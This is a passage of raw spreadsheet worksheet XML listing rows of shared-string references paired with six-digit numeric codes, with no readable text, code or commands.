    <row r="21877" spans="1:3">
      <c r="A21877" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21877" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21877" s="15">
        <v>850290</v>
      </c>
    </row>
    <row r="21878" spans="1:3">
      <c r="A21878" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21878" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21878" s="15">
        <v>850460</v>
      </c>
    </row>
    <row r="21879" spans="1:3">
      <c r="A21879" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21879" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21879" s="15">
        <v>850480</v>
      </c>
    </row>
    <row r="21880" spans="1:3">
      <c r="A21880" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21880" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21880" s="15">
        <v>850490</v>
      </c>
    </row>
    <row r="21881" spans="1:3">
      <c r="A21881" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21881" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21881" s="15">
        <v>850550</v>
      </c>
    </row>
    <row r="21882" spans="1:3">
      <c r="A21882" s="28" t="s">
        <v>26986</v>
      </c>
      <c r="B21882" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21882" s="15">
        <v>850560</v>
      </c>
    </row>
    <row r="21883" spans="1:3">
      <c r="A21883" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21883" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21883" s="15">
        <v>850570</v>
      </c>
    </row>
    <row r="21884" spans="1:3">
      <c r="A21884" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21884" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21884" s="15">
        <v>850580</v>
      </c>
    </row>
    <row r="21885" spans="1:3">
      <c r="A21885" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21885" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21885" s="15">
        <v>850590</v>
      </c>
    </row>
    <row r="21886" spans="1:3">
      <c r="A21886" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21886" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21886" s="15">
        <v>850660</v>
      </c>
    </row>
    <row r="21887" spans="1:3">
      <c r="A21887" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21887" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21887" s="15">
        <v>850667</v>
      </c>
    </row>
    <row r="21888" spans="1:3">
      <c r="A21888" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21888" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21888" s="15">
        <v>850670</v>
      </c>
    </row>
    <row r="21889" spans="1:3">
      <c r="A21889" s="28" t="s">
        <v>26985</v>
      </c>
      <c r="B21889" s="14" t="s">
        <v>17471</v>
      </c>
      <c r="C21889" s="15">
        <v>850845</v>
      </c>
    </row>
    <row r="21890" spans="1:3">
      <c r="A21890" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21890" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21890" s="15">
        <v>851290</v>
      </c>
    </row>
    <row r="21891" spans="1:3">
      <c r="A21891" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21891" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21891" s="15">
        <v>851460</v>
      </c>
    </row>
    <row r="21892" spans="1:3">
      <c r="A21892" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21892" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21892" s="15">
        <v>851480</v>
      </c>
    </row>
    <row r="21893" spans="1:3">
      <c r="A21893" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21893" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21893" s="15">
        <v>851490</v>
      </c>
    </row>
    <row r="21894" spans="1:3">
      <c r="A21894" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21894" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21894" s="15">
        <v>851550</v>
      </c>
    </row>
    <row r="21895" spans="1:3">
      <c r="A21895" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21895" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21895" s="15">
        <v>851560</v>
      </c>
    </row>
    <row r="21896" spans="1:3">
      <c r="A21896" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21896" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21896" s="15">
        <v>851570</v>
      </c>
    </row>
    <row r="21897" spans="1:3">
      <c r="A21897" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21897" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21897" s="15">
        <v>851580</v>
      </c>
    </row>
    <row r="21898" spans="1:3">
      <c r="A21898" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21898" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21898" s="15">
        <v>851590</v>
      </c>
    </row>
    <row r="21899" spans="1:3">
      <c r="A21899" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21899" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21899" s="15">
        <v>851660</v>
      </c>
    </row>
    <row r="21900" spans="1:3">
      <c r="A21900" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21900" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21900" s="15">
        <v>851667</v>
      </c>
    </row>
    <row r="21901" spans="1:3">
      <c r="A21901" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21901" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21901" s="15">
        <v>851670</v>
      </c>
    </row>
    <row r="21902" spans="1:3">
      <c r="A21902" s="28" t="s">
        <v>26987</v>
      </c>
      <c r="B21902" s="14" t="s">
        <v>17472</v>
      </c>
      <c r="C21902" s="15">
        <v>851845</v>
      </c>
    </row>
    <row r="21903" spans="1:3">
      <c r="A21903" s="28" t="s">
        <v>26988</v>
      </c>
      <c r="B21903" s="14" t="s">
        <v>17473</v>
      </c>
      <c r="C21903" s="15">
        <v>852055</v>
      </c>
    </row>
    <row r="21904" spans="1:3">
      <c r="A21904" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21904" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21904" s="15">
        <v>853290</v>
      </c>
    </row>
    <row r="21905" spans="1:3">
      <c r="A21905" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21905" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21905" s="15">
        <v>853460</v>
      </c>
    </row>
    <row r="21906" spans="1:3">
      <c r="A21906" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21906" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21906" s="15">
        <v>853480</v>
      </c>
    </row>
    <row r="21907" spans="1:3">
      <c r="A21907" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21907" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21907" s="15">
        <v>853490</v>
      </c>
    </row>
    <row r="21908" spans="1:3">
      <c r="A21908" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21908" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21908" s="15">
        <v>853545</v>
      </c>
    </row>
    <row r="21909" spans="1:3">
      <c r="A21909" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21909" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21909" s="15">
        <v>853550</v>
      </c>
    </row>
    <row r="21910" spans="1:3">
      <c r="A21910" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21910" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21910" s="15">
        <v>853555</v>
      </c>
    </row>
    <row r="21911" spans="1:3">
      <c r="A21911" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21911" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21911" s="15">
        <v>853560</v>
      </c>
    </row>
    <row r="21912" spans="1:3">
      <c r="A21912" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21912" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21912" s="15">
        <v>853570</v>
      </c>
    </row>
    <row r="21913" spans="1:3">
      <c r="A21913" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21913" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21913" s="15">
        <v>853580</v>
      </c>
    </row>
    <row r="21914" spans="1:3">
      <c r="A21914" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21914" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21914" s="15">
        <v>853590</v>
      </c>
    </row>
    <row r="21915" spans="1:3">
      <c r="A21915" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21915" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21915" s="15">
        <v>853626</v>
      </c>
    </row>
    <row r="21916" spans="1:3">
      <c r="A21916" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21916" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21916" s="15">
        <v>853645</v>
      </c>
    </row>
    <row r="21917" spans="1:3">
      <c r="A21917" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21917" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21917" s="15">
        <v>853660</v>
      </c>
    </row>
    <row r="21918" spans="1:3">
      <c r="A21918" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21918" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21918" s="15">
        <v>853667</v>
      </c>
    </row>
    <row r="21919" spans="1:3">
      <c r="A21919" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21919" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21919" s="15">
        <v>853670</v>
      </c>
    </row>
    <row r="21920" spans="1:3">
      <c r="A21920" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21920" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21920" s="15">
        <v>853674</v>
      </c>
    </row>
    <row r="21921" spans="1:3">
      <c r="A21921" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21921" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21921" s="15">
        <v>853755</v>
      </c>
    </row>
    <row r="21922" spans="1:3">
      <c r="A21922" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21922" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21922" s="15">
        <v>853767</v>
      </c>
    </row>
    <row r="21923" spans="1:3">
      <c r="A21923" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21923" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21923" s="15">
        <v>853845</v>
      </c>
    </row>
    <row r="21924" spans="1:3">
      <c r="A21924" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21924" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21924" s="15">
        <v>853855</v>
      </c>
    </row>
    <row r="21925" spans="1:3">
      <c r="A21925" s="28" t="s">
        <v>26989</v>
      </c>
      <c r="B21925" s="14" t="s">
        <v>17474</v>
      </c>
      <c r="C21925" s="15">
        <v>853867</v>
      </c>
    </row>
    <row r="21926" spans="1:3">
      <c r="A21926" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21926" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21926" s="15">
        <v>855290</v>
      </c>
    </row>
    <row r="21927" spans="1:3">
      <c r="A21927" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21927" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21927" s="15">
        <v>855460</v>
      </c>
    </row>
    <row r="21928" spans="1:3">
      <c r="A21928" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21928" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21928" s="15">
        <v>855480</v>
      </c>
    </row>
    <row r="21929" spans="1:3">
      <c r="A21929" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21929" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21929" s="15">
        <v>855490</v>
      </c>
    </row>
    <row r="21930" spans="1:3">
      <c r="A21930" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21930" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21930" s="15">
        <v>855545</v>
      </c>
    </row>
    <row r="21931" spans="1:3">
      <c r="A21931" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21931" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21931" s="15">
        <v>855550</v>
      </c>
    </row>
    <row r="21932" spans="1:3">
      <c r="A21932" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21932" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21932" s="15">
        <v>855560</v>
      </c>
    </row>
    <row r="21933" spans="1:3">
      <c r="A21933" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21933" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21933" s="15">
        <v>855570</v>
      </c>
    </row>
    <row r="21934" spans="1:3">
      <c r="A21934" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21934" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21934" s="15">
        <v>855580</v>
      </c>
    </row>
    <row r="21935" spans="1:3">
      <c r="A21935" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21935" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21935" s="15">
        <v>855590</v>
      </c>
    </row>
    <row r="21936" spans="1:3">
      <c r="A21936" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21936" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21936" s="15">
        <v>855645</v>
      </c>
    </row>
    <row r="21937" spans="1:3">
      <c r="A21937" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21937" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21937" s="15">
        <v>855660</v>
      </c>
    </row>
    <row r="21938" spans="1:3">
      <c r="A21938" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21938" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21938" s="15">
        <v>855667</v>
      </c>
    </row>
    <row r="21939" spans="1:3">
      <c r="A21939" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21939" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21939" s="15">
        <v>855670</v>
      </c>
    </row>
    <row r="21940" spans="1:3">
      <c r="A21940" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21940" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21940" s="15">
        <v>855674</v>
      </c>
    </row>
    <row r="21941" spans="1:3">
      <c r="A21941" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21941" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21941" s="15">
        <v>855755</v>
      </c>
    </row>
    <row r="21942" spans="1:3">
      <c r="A21942" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21942" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21942" s="15">
        <v>855767</v>
      </c>
    </row>
    <row r="21943" spans="1:3">
      <c r="A21943" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21943" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21943" s="15">
        <v>855845</v>
      </c>
    </row>
    <row r="21944" spans="1:3">
      <c r="A21944" s="28" t="s">
        <v>26990</v>
      </c>
      <c r="B21944" s="14" t="s">
        <v>17475</v>
      </c>
      <c r="C21944" s="15">
        <v>855867</v>
      </c>
    </row>
    <row r="21945" spans="1:3">
      <c r="A21945" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21945" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21945" s="15">
        <v>856000</v>
      </c>
    </row>
    <row r="21946" spans="1:3">
      <c r="A21946" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21946" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21946" s="15">
        <v>856290</v>
      </c>
    </row>
    <row r="21947" spans="1:3">
      <c r="A21947" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21947" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21947" s="15">
        <v>856460</v>
      </c>
    </row>
    <row r="21948" spans="1:3">
      <c r="A21948" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21948" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21948" s="15">
        <v>856545</v>
      </c>
    </row>
    <row r="21949" spans="1:3">
      <c r="A21949" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21949" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21949" s="15">
        <v>856550</v>
      </c>
    </row>
    <row r="21950" spans="1:3">
      <c r="A21950" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21950" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21950" s="15">
        <v>856555</v>
      </c>
    </row>
    <row r="21951" spans="1:3">
      <c r="A21951" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21951" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21951" s="15">
        <v>856560</v>
      </c>
    </row>
    <row r="21952" spans="1:3">
      <c r="A21952" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21952" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21952" s="15">
        <v>856570</v>
      </c>
    </row>
    <row r="21953" spans="1:3">
      <c r="A21953" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21953" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21953" s="15">
        <v>856580</v>
      </c>
    </row>
    <row r="21954" spans="1:3">
      <c r="A21954" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21954" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21954" s="15">
        <v>856590</v>
      </c>
    </row>
    <row r="21955" spans="1:3">
      <c r="A21955" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21955" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21955" s="15">
        <v>856660</v>
      </c>
    </row>
    <row r="21956" spans="1:3">
      <c r="A21956" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21956" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21956" s="15">
        <v>856667</v>
      </c>
    </row>
    <row r="21957" spans="1:3">
      <c r="A21957" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21957" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21957" s="15">
        <v>856670</v>
      </c>
    </row>
    <row r="21958" spans="1:3">
      <c r="A21958" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21958" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21958" s="15">
        <v>856674</v>
      </c>
    </row>
    <row r="21959" spans="1:3">
      <c r="A21959" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21959" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21959" s="15">
        <v>856755</v>
      </c>
    </row>
    <row r="21960" spans="1:3">
      <c r="A21960" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21960" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21960" s="15">
        <v>856767</v>
      </c>
    </row>
    <row r="21961" spans="1:3">
      <c r="A21961" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21961" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21961" s="15">
        <v>856855</v>
      </c>
    </row>
    <row r="21962" spans="1:3">
      <c r="A21962" s="28" t="s">
        <v>26991</v>
      </c>
      <c r="B21962" s="14" t="s">
        <v>17476</v>
      </c>
      <c r="C21962" s="15">
        <v>856867</v>
      </c>
    </row>
    <row r="21963" spans="1:3">
      <c r="A21963" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21963" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21963" s="15">
        <v>857000</v>
      </c>
    </row>
    <row r="21964" spans="1:3">
      <c r="A21964" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21964" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21964" s="15">
        <v>857290</v>
      </c>
    </row>
    <row r="21965" spans="1:3">
      <c r="A21965" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21965" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21965" s="15">
        <v>857460</v>
      </c>
    </row>
    <row r="21966" spans="1:3">
      <c r="A21966" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21966" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21966" s="15">
        <v>857480</v>
      </c>
    </row>
    <row r="21967" spans="1:3">
      <c r="A21967" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21967" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21967" s="15">
        <v>857490</v>
      </c>
    </row>
    <row r="21968" spans="1:3">
      <c r="A21968" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21968" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21968" s="15">
        <v>857545</v>
      </c>
    </row>
    <row r="21969" spans="1:3">
      <c r="A21969" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21969" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21969" s="15">
        <v>857550</v>
      </c>
    </row>
    <row r="21970" spans="1:3">
      <c r="A21970" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21970" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21970" s="15">
        <v>857560</v>
      </c>
    </row>
    <row r="21971" spans="1:3">
      <c r="A21971" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21971" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21971" s="15">
        <v>857570</v>
      </c>
    </row>
    <row r="21972" spans="1:3">
      <c r="A21972" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21972" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21972" s="15">
        <v>857580</v>
      </c>
    </row>
    <row r="21973" spans="1:3">
      <c r="A21973" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21973" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21973" s="15">
        <v>857590</v>
      </c>
    </row>
    <row r="21974" spans="1:3">
      <c r="A21974" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21974" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21974" s="15">
        <v>857626</v>
      </c>
    </row>
    <row r="21975" spans="1:3">
      <c r="A21975" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21975" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21975" s="15">
        <v>857645</v>
      </c>
    </row>
    <row r="21976" spans="1:3">
      <c r="A21976" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21976" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21976" s="15">
        <v>857660</v>
      </c>
    </row>
    <row r="21977" spans="1:3">
      <c r="A21977" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21977" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21977" s="15">
        <v>857667</v>
      </c>
    </row>
    <row r="21978" spans="1:3">
      <c r="A21978" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21978" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21978" s="15">
        <v>857670</v>
      </c>
    </row>
    <row r="21979" spans="1:3">
      <c r="A21979" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21979" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21979" s="15">
        <v>857674</v>
      </c>
    </row>
    <row r="21980" spans="1:3">
      <c r="A21980" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21980" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21980" s="15">
        <v>857755</v>
      </c>
    </row>
    <row r="21981" spans="1:3">
      <c r="A21981" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21981" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21981" s="15">
        <v>857767</v>
      </c>
    </row>
    <row r="21982" spans="1:3">
      <c r="A21982" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21982" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21982" s="15">
        <v>857845</v>
      </c>
    </row>
    <row r="21983" spans="1:3">
      <c r="A21983" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21983" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21983" s="15">
        <v>857855</v>
      </c>
    </row>
    <row r="21984" spans="1:3">
      <c r="A21984" s="28" t="s">
        <v>26992</v>
      </c>
      <c r="B21984" s="14" t="s">
        <v>17477</v>
      </c>
      <c r="C21984" s="15">
        <v>857867</v>
      </c>
    </row>
    <row r="21985" spans="1:3">
      <c r="A21985" s="28" t="s">
        <v>26993</v>
      </c>
      <c r="B21985" s="14" t="s">
        <v>17478</v>
      </c>
      <c r="C21985" s="15">
        <v>860055</v>
      </c>
    </row>
    <row r="21986" spans="1:3">
      <c r="A21986" s="28" t="s">
        <v>26993</v>
      </c>
      <c r="B21986" s="14" t="s">
        <v>17478</v>
      </c>
      <c r="C21986" s="15">
        <v>860845</v>
      </c>
    </row>
    <row r="21987" spans="1:3">
      <c r="A21987" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21987" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21987" s="15">
        <v>861290</v>
      </c>
    </row>
    <row r="21988" spans="1:3">
      <c r="A21988" s="28" t="s">
        <v>26995</v>
      </c>
      <c r="B21988" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21988" s="15">
        <v>861460</v>
      </c>
    </row>
    <row r="21989" spans="1:3">
      <c r="A21989" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21989" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21989" s="15">
        <v>861480</v>
      </c>
    </row>
    <row r="21990" spans="1:3">
      <c r="A21990" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21990" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21990" s="15">
        <v>861490</v>
      </c>
    </row>
    <row r="21991" spans="1:3">
      <c r="A21991" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21991" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21991" s="15">
        <v>861550</v>
      </c>
    </row>
    <row r="21992" spans="1:3">
      <c r="A21992" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21992" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21992" s="15">
        <v>861560</v>
      </c>
    </row>
    <row r="21993" spans="1:3">
      <c r="A21993" s="28" t="s">
        <v>26996</v>
      </c>
      <c r="B21993" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21993" s="15">
        <v>861570</v>
      </c>
    </row>
    <row r="21994" spans="1:3">
      <c r="A21994" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21994" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21994" s="15">
        <v>861580</v>
      </c>
    </row>
    <row r="21995" spans="1:3">
      <c r="A21995" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21995" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21995" s="15">
        <v>861590</v>
      </c>
    </row>
    <row r="21996" spans="1:3">
      <c r="A21996" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21996" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21996" s="15">
        <v>861645</v>
      </c>
    </row>
    <row r="21997" spans="1:3">
      <c r="A21997" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21997" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21997" s="15">
        <v>861660</v>
      </c>
    </row>
    <row r="21998" spans="1:3">
      <c r="A21998" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21998" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21998" s="15">
        <v>861667</v>
      </c>
    </row>
    <row r="21999" spans="1:3">
      <c r="A21999" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B21999" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C21999" s="15">
        <v>861670</v>
      </c>
    </row>
    <row r="22000" spans="1:3">
      <c r="A22000" s="28" t="s">
        <v>26997</v>
      </c>
      <c r="B22000" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C22000" s="15">
        <v>861755</v>
      </c>
    </row>
    <row r="22001" spans="1:3">
      <c r="A22001" s="28" t="s">
        <v>20986</v>
      </c>
      <c r="B22001" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C22001" s="15">
        <v>861845</v>
      </c>
    </row>
    <row r="22002" spans="1:3">
      <c r="A22002" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B22002" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C22002" s="15">
        <v>861855</v>
      </c>
    </row>
    <row r="22003" spans="1:3">
      <c r="A22003" s="28" t="s">
        <v>26994</v>
      </c>
      <c r="B22003" s="14" t="s">
        <v>12474</v>
      </c>
      <c r="C22003" s="15">
        <v>861867</v>
      </c>
    </row>
    <row r="22004" spans="1:3">
      <c r="A22004" s="28" t="s">
        <v>26998</v>
      </c>
      <c r="B22004" s="14" t="s">
        <v>17479</v>
      </c>
      <c r="C22004" s="15">
        <v>862055</v>
      </c>
    </row>
    <row r="22005" spans="1:3">
      <c r="A22005" s="28" t="s">
        <v>26999</v>
      </c>
      <c r="B22005" s="14" t="s">
        <v>17480</v>
      </c>
      <c r="C22005" s="15">
        <v>863560</v>
      </c>
    </row>
    <row r="22006" spans="1:3">
      <c r="A22006" s="28" t="s">
